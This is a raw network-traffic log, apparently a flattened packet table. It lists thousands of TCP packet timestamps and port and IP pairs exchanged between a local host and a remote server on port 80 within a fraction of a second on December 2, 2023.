                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478435040 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478471041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478477955 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478507996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478543997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478559017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478579998 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478615999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478622913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478656054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478692055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478698969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478727102 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478765965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478775978 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478801966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478837013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478842974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478872061 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478907108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478916883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478945017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478980064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.478990078 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479016066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479051113 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479058027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479089022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479123116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479131937 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479159117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479193926 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479201078 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479229927 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479268074 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479274988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479305029 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479345083 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479372978 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479379892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479393959 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479415894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479429007 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479453087 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479465008 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479490042 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479501963 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479527950 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479533911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479564905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479571104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479602098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479612112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479643106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479650974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479679108 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479687929 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479724884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479724884 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479762077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479772091 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479796886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479804993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479834080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479841948 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479871988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479892969 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479907990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479924917 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479943991 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479954958 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479980946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.479984999 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480016947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480026007 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480057955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480067015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480097055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480104923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480133057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480139017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480169058 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480175018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480217934 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480221987 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480257034 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480262041 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480293989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480304956 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480333090 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480343103 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480370045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480379105 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480407953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480413914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480444908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480475903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480483055 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480496883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480520964 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480532885 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480556011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480577946 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480591059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480602980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480633020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480638027 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480670929 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480680943 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480706930 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480717897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480742931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480751038 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480779886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480787039 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480817080 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480825901 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480853081 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480860949 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480889082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480901003 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480923891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480933905 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480961084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480968952 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.480998993 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481009960 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481034994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481044054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481070995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481080055 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481106043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481113911 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481142044 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481151104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481178999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481184959 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481215954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481225014 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481261015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481283903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481321096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481333017 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481357098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481370926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481391907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481401920 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481427908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481436968 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481463909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481471062 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481514931 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481523037 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481550932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481558084 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481585979 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481594086 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481636047 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481713057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481750011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481760025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481785059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481796026 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481821060 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481827974 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481858969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481868029 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481895924 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481903076 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481930971 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481940031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481966972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.481973886 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482004881 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482012987 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482040882 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482048988 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482076883 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482084990 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482114077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482120991 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482153893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482161045 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482189894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482228041 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482230902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482266903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482266903 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482266903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482304096 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482317924 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482343912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482348919 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482381105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482388973 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482417107 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482423067 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482455969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482460976 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482491016 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482496977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482527018 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482536077 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482563972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482590914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482598066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482615948 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482640028 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482652903 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482675076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482683897 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482712984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482723951 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482748985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482755899 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482785940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482794046 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482821941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482835054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482858896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482868910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482882977 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482898951 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482899904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482918024 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482923031 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482934952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482942104 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482953072 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482954979 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482970953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482976913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482984066 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.482995987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483000994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483007908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483009100 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483020067 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483031988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483037949 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483037949 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483043909 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483055115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483066082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483077049 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483083010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483088970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483099937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483107090 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483112097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483123064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483125925 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483136892 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483149052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483149052 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483160973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483166933 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:43.483175039 CET804972091.215.85.17192.168.2.6
